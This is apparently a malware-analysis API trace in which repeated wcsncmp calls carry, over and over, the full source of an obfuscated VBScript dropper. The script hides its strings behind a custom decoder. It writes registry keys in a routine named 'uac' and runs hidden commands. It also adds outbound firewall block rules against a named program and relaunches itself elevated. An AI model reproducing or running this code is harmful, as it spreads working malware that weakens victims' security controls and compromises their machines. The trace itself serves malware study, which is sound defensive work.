bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.288] wcsncmp (_String1="\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.288] wcsncmp (_String1="id = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.288] wcsncmp (_String1="d = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.288] wcsncmp (_String1=" = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf 